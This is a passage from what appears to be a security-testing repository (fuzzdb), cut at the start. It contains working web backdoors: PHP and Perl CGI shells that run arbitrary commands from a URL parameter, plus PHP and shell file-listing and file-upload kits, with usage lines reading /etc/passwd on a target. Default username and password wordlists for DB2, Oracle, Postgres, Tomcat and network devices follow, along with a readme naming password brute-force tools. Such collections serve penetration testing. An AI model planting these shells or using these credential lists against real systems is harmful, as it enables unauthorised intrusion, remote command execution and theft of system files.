system($_GET['cmd']); 20 | } 21 | ?> 22 | </pre> 23 | </BODY></HTML> 24 | 25 | 26 | -------------------------------------------------------------------------------- /web-backdoors/php/list.php: -------------------------------------------------------------------------------- 1 | <? 2 | // 3 | // PHP_KIT 4 | // 5 | // list.php = Directory & File Listing 6 | // 7 | // by: The Dark Raver 8 | // modified: 21/01/2004 9 | // 10 | ?> 11 | 12 | <? 13 | 14 | if($_GET['file']) { 15 | $fichero=$_GET['file']; 16 | } else { 17 | $fichero="/"; 18 | } 19 | 20 | if($handle = @opendir($fichero)) { 21 | while($filename = readdir($handle)) { 22 | echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>"; 23 | } 24 | closedir($handle); 25 | } else { 26 | echo "FILE: " . $fichero . "<br><hr><pre>"; 27 | $fp = fopen($fichero, "r"); 28 | $buffer = fread($fp, filesize($fichero)); 29 | echo $buffer; 30 | fclose($fp); 31 | } 32 | 33 | ?> -------------------------------------------------------------------------------- /web-backdoors/php/simple-backdoor.php: -------------------------------------------------------------------------------- 1 | <!-- Simple PHP backdoor by DK (http://michaeldaw.org) --> 2 | 3 | <?php 4 | 5 | if(isset($_REQUEST['cmd'])){ 6 | echo "<pre>"; 7 | $cmd = ($_REQUEST['cmd']); 8 | system($cmd); 9 | echo "</pre>"; 10 | die; 11 | } 12 | 13 | ?> 14 | 15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 16 | 17 | <!-- http://michaeldaw.org 2006 --> 18 | -------------------------------------------------------------------------------- /web-backdoors/php/up.php: -------------------------------------------------------------------------------- 1 | <? 2 | // 3 | // PHP_KIT 4 | // 5 | // up.php = File Upload 6 | // 7 | // by: The Dark Raver 8 | // modified: 21/01/2004 9 | // 10 | ?> 11 | 12 | <html><body> 13 | 14 | <form enctype="multipart/form-data" action="" method="post"> 15 | <input type="hidden" name="MAX_FILE_SIZE" value="1000000"> 16 | <p>Local File: <input name="userfile" type="file"> 17 | <p>Remote File: <input name="remotefile" type="text"> 18 | <input type="submit" value="Send"> 19 | </form><br><br><br> 20 | 21 | <? 22 | 23 | if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) { 24 | copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']); 25 | echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name']; 26 | } else { 27 | echo "No File Uploaded"; 28 | } 29 | 30 | ?> 31 | 32 | </html></body> 33 | 34 | -------------------------------------------------------------------------------- /web-backdoors/pl-cgi/perlcmd.cgi: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | use strict; 4 | 5 | print "Cache-Control: no-cache\n"; 6 | print "Content-type: text/html\n\n"; 7 | 8 | my $req = $ENV{QUERY_STRING}; 9 | chomp ($req); 10 | $req =~ s/%20/ /g; 11 | $req =~ s/%3b/;/g; 12 | 13 | print "<html><body>"; 14 | 15 | print '<!-- Simple CGI backdoor by DK (http://michaeldaw.org) -->'; 16 | 17 | if (!$req) { 18 | print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd"; 19 | } 20 | else { 21 | print "Executing: $req"; 22 | } 23 | 24 | print "<pre>"; 25 | my @cmd = `$req`; 26 | print "</pre>"; 27 | 28 | foreach my $line (@cmd) { 29 | print $line . "<br/>"; 30 | } 31 | 32 | print "</body></html>"; 33 | 34 | # <!-- http://michaeldaw.org 2006 --> 35 | -------------------------------------------------------------------------------- /web-backdoors/sh/cmd.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/web-backdoors/sh/cmd.sh -------------------------------------------------------------------------------- /web-backdoors/sh/list.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # SH_KIT 4 | # 5 | # list.sh = Directory & File Listing 6 | # 7 | # by: The Dark Raver 8 | # modified: 16/12/2005 9 | # 10 | 11 | echo Content-Type: text/html 12 | echo 13 | 14 | if [ "$QUERY_STRING" != "" ] 15 | then 16 | echo PATH: $QUERY_STRING "<br><hr>" 17 | echo `ls $QUERY_STRING` > /tmp/test 18 | else 19 | echo PATH: / "<br><hr>" 20 | echo > /tmp/test 21 | QUERY_STRING="/" 22 | root="1" 23 | fi 24 | 25 | out=`grep "/" /tmp/test` 26 | 27 | if [ "$out" != "" ] 28 | then 29 | echo FICHERO: $QUERY_STRING 30 | echo "<hr><pre>" 31 | cat $QUERY_STRING 32 | else 33 | if [ "$root" != "1" ] 34 | then 35 | echo "( ) <a href=?"$QUERY_STRING"/..>".."</a><br>" 36 | fi 37 | for i in `ls $QUERY_STRING` 38 | do 39 | if [ "$root" == "1" ] 40 | then 41 | echo "( ) <a href=?/"$i">"$i"</a><br>" 42 | else 43 | echo "( ) <a href=?"$QUERY_STRING"/"$i">"$i"</a><br>" 44 | fi 45 | done 46 | 47 | fi -------------------------------------------------------------------------------- /web-backdoors/sh/up.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # BETA1 - upload to /tmp/upload 4 | # 5 | # SH_KIT 6 | # 7 | # up.sh = File Upload 8 | # 9 | # by: The Dark Raver 10 | # modified: 16/12/2005 11 | # 12 | 13 | echo Content-Type: text/html 14 | echo 15 | 16 | echo "<html><body>" 17 | echo "<form enctype=\"multipart/form-data\" action=\"\" method=\"post\">" 18 | echo "<p>Local File: <input name=\"userfile\" type=\"file\">" 19 | echo "<input type=\"submit\" value=\"Send\">" 20 | echo "</form><br><br><br>" 21 | 22 | echo "<hr>" 23 | 24 | dd count=$CONTENT_LENGTH bs=1 of=/tmp/test 25 | 26 | lineas=`cat /tmp/test | wc -l` 27 | #echo LIN: $lineas 28 | lineas2=`expr $lineas - 4` 29 | #echo LIN2: $lineas2 30 | lineas3=`expr $lineas2 - 1` 31 | #echo LIN3: $lineas3 32 | 33 | #echo "<hr>" 34 | 35 | tail -$lineas2 /tmp/test > /tmp/test2 36 | head -$lineas3 /tmp/test2 > /tmp/upload 37 | #rm /tmp/test 38 | #rm /tmp/test2 39 | 40 | echo "<pre>" 41 | cat /tmp/upload 42 | echo "</pre>" 43 | 44 | -------------------------------------------------------------------------------- /wordlists-misc/common-http-ports.txt: -------------------------------------------------------------------------------- 1 | 66 2 | 80 3 | 81 4 | 443 5 | 445 6 | 457 7 | 1080 8 | 1100 9 | 1241 10 | 1352 11 | 1433 12 | 1434 13 | 1521 14 | 1944 15 | 2301 16 | 3128 17 | 3306 18 | 4000 19 | 4001 20 | 4002 21 | 4100 22 | 5000 23 | 5432 24 | 5800 25 | 5801 26 | 5802 27 | 6346 28 | 6347 29 | 7001 30 | 7002 31 | 8080 32 | 8888 33 | 30821 34 | -------------------------------------------------------------------------------- /wordlists-misc/wordlist-alphanumeric-case.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 1 3 | 2 4 | 3 5 | 4 6 | 5 7 | 6 8 | 7 9 | 8 10 | 9 11 | a 12 | b 13 | c 14 | d 15 | e 16 | f 17 | g 18 | h 19 | i 20 | j 21 | k 22 | l 23 | m 24 | n 25 | o 26 | p 27 | q 28 | r 29 | s 30 | t 31 | u 32 | v 33 | w 34 | x 35 | y 36 | z 37 | A 38 | B 39 | C 40 | D 41 | E 42 | F 43 | G 44 | H 45 | I 46 | J 47 | K 48 | L 49 | M 50 | N 51 | O 52 | P 53 | Q 54 | R 55 | S 56 | T 57 | U 58 | V 59 | W 60 | X 61 | Y 62 | Z 63 | -------------------------------------------------------------------------------- /wordlists-misc/wordlist-dna.txt: -------------------------------------------------------------------------------- 1 | a 2 | t 3 | c 4 | g 5 | -------------------------------------------------------------------------------- /wordlists-user-passwd/db2/db2_default_pass.txt: -------------------------------------------------------------------------------- 1 | db2inst1 2 | dasusr1 3 | db2fenc1 4 | db2pass 5 | db2pw 6 | db2password 7 | admin 8 | db2admin 9 | -------------------------------------------------------------------------------- /wordlists-user-passwd/db2/db2_default_user.txt: -------------------------------------------------------------------------------- 1 | db2inst1 2 | dasusr1 3 | db2fenc1 4 | admin 5 | db2admin 6 | -------------------------------------------------------------------------------- /wordlists-user-passwd/db2/db2_default_userpass.txt: -------------------------------------------------------------------------------- 1 | db2inst1 db2inst1 2 | db2inst1 db2pass 3 | db2inst1 db2pw 4 | db2inst1 db2password 5 | dasusr1 dasusr1 6 | db2fenc1 db2fenc1 7 | db2admin db2admin 8 | 9 | -------------------------------------------------------------------------------- /wordlists-user-passwd/generic-listpairs/http_default_pass.txt: -------------------------------------------------------------------------------- 1 | admin 2 | password 3 | manager 4 | letmein 5 | cisco 6 | default 7 | root 8 | apc 9 | pass 10 | security 11 | user 12 | system 13 | sys 14 | none 15 | -------------------------------------------------------------------------------- /wordlists-user-passwd/generic-listpairs/http_default_userpass.txt: -------------------------------------------------------------------------------- 1 | # needs help 2 | connect connect 3 | sitecom sitecom 4 | admin 1234 5 | cisco cisco 6 | cisco sanfran 7 | private private 8 | -------------------------------------------------------------------------------- /wordlists-user-passwd/generic-listpairs/http_default_users.txt: -------------------------------------------------------------------------------- 1 | admin 2 | manager 3 | root 4 | cisco 5 | apc 6 | pass 7 | security 8 | user 9 | system 10 | sys 11 | -------------------------------------------------------------------------------- /wordlists-user-passwd/oracle/_hci_oracle_passwords.txt: -------------------------------------------------------------------------------- 1 | # This file needs some help! "AMBU,hacschema" "QUEUE_USER,qmanager" "SYS,alLp0ver2" "SYSTEM,urA7mvP" "CHANGEMGR,datacontrol" "CCDEV,ccdev" "CCDBA,ccnulls " "CCDATA,ccdata" "CCFORMS,ccforms" "CCINTERFACE,ccinterface" "MCKHEO,mckheo" "CCREL,ccrel" "CCQUERY,ccquery" "CDXWEB,winplu5" "DRUG1,fdb3schema" "DRUG2,fdb3schema" "enc_ent,encent" "ENT,entpazz" "ENT_CONFIG,ent_configpazz" "ADF,adfpazz" "INF,infpazz" "INF_CONFIG,inf_configpazz" "SDM,sdmpazz" "STRMADM,pazzw0rd" "ENT_AUD,pazzw0rd" "ENT_ARCH,pazzw0rd" "POC_ARCH,pazzw0rd" "POC_AQ,qmanager" "INF_AQ,qmanager" "DATAMGR,datamgr" "CCUSER,bueno" "ALERTS,monitorhca" "HCALERTS,alertsuser" "AM,ampazz" "AM_AUD,pazzw0rd" "AUD,audpazz" "TMF,tmfpazz" "MN,mnpazz" "EH,ehpazz" "NG,ngpazz" "DM,dmpazz" "DMTOOL,dmtoolpazz" "STG_DMT,stg_dmtpazz" "WRL,wrlpazz" "NOTES,notespazz" "REPORTS,reportspazz" "ICONS,iconspazz" "BS,bspazz" "QZ,qzpazz" "RM,rmpazz" "RM_AUD,pazzw0rd" "COMMGR,commgrpazz" "OPSERVICE,opservicepazz" "SEC_CONFIG,sec_configpazz" "CTXSYS,ctxsyspazz" "OLOGY,ologypazz" "OLOGY_CONFIG,ology_configpazz" "DOC,docpazz" "DOC_CONFIG,doc_configpazz" "PORTAL,portal" "PORTAL_INSTALL,portal_install" "EBIDBADMIN,ebidbadmin" "DESIGN_OWNER,owb" "OWB_RUNTIME_REPOSITORY,owb" "RUNTIME_A_USER,owb" 2 | -------------------------------------------------------------------------------- /wordlists-user-passwd/passwds/phpbb.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/wordlists-user-passwd/passwds/phpbb.txt -------------------------------------------------------------------------------- /wordlists-user-passwd/postgres/postgres_default_pass.txt: -------------------------------------------------------------------------------- 1 | 2 | tiger 3 | postgres 4 | password 5 | admin 6 | -------------------------------------------------------------------------------- /wordlists-user-passwd/postgres/postgres_default_user.txt: -------------------------------------------------------------------------------- 1 | postgres 2 | scott 3 | admin 4 | -------------------------------------------------------------------------------- /wordlists-user-passwd/postgres/postgres_default_userpass.txt: -------------------------------------------------------------------------------- 1 | postgres postgres 2 | postgres password 3 | postgres admin 4 | admin admin 5 | admin password 6 | -------------------------------------------------------------------------------- /wordlists-user-passwd/readme.txt: -------------------------------------------------------------------------------- 1 | 2 | various notes 3 | 4 | leetspeak filter 5 | cat plain.wordlist | sed -e 's/a/4/g' -e 's/e/3/g' -e 's/i/1/g' -e 's/o/0/g' -e 's/s/5/g' -e 's/t/7/g' > l337.wordlist 6 | 7 | more wordlists 8 | ftp://ftp.ox.ac.uk/pub/wordlists/ 9 | http://theargon.com/achilles/wordlists/ 10 | http://www.totse.com/en/hack/word_lists/index.html 11 | http://www.outpost9.com/files/WordLists.html 12 | http://packetstormsecurity.org/Crackers/wordlists/ 13 | 14 | passwd brute force tools 15 | 16 | cupp - passwd profiler 17 | http://www.remote-exploit.org/?page_id=506 18 | 19 | awlg - associative wordlist generator 20 | http://awlg.org/index.gen 21 | 22 | thc-hydra 23 | http://freeworld.thc.org/thc-hydra/ 24 | 25 | cain & abel 26 | http://www.oxid.it/cain.html 27 | 28 | jtr 29 | http://www.openwall.com/john/ 30 | 31 | lcp - free l0phtcrack replacement 32 | http://www.lcpsoft.com/english/download.htm 33 | 34 | 35 | -------------------------------------------------------------------------------- /wordlists-user-passwd/tomcat/tomcat_mgr_default_pass.txt: -------------------------------------------------------------------------------- 1 | admin 2 | manager 3 | role1 4 | root 5 | tomcat 6 | -------------------------------------------------------------------------------- /wordlists-user-passwd/tomcat/tomcat_mgr_default_userpass.txt: -------------------------------------------------------------------------------- 1 | j2deployer j2deployer 2 | ovwebusr OvW*busr1 3 | cxsdk kdsxc 4 | root owaspbwa 5 | -------------------------------------------------------------------------------- /wordlists-user-passwd/tomcat/tomcat_mgr_default_users.txt: -------------------------------------------------------------------------------- 1 | admin 2 | manager 3 | role1 4 | root 5 | tomcat 6 | both 7 | --------------------------------------------------------------------------------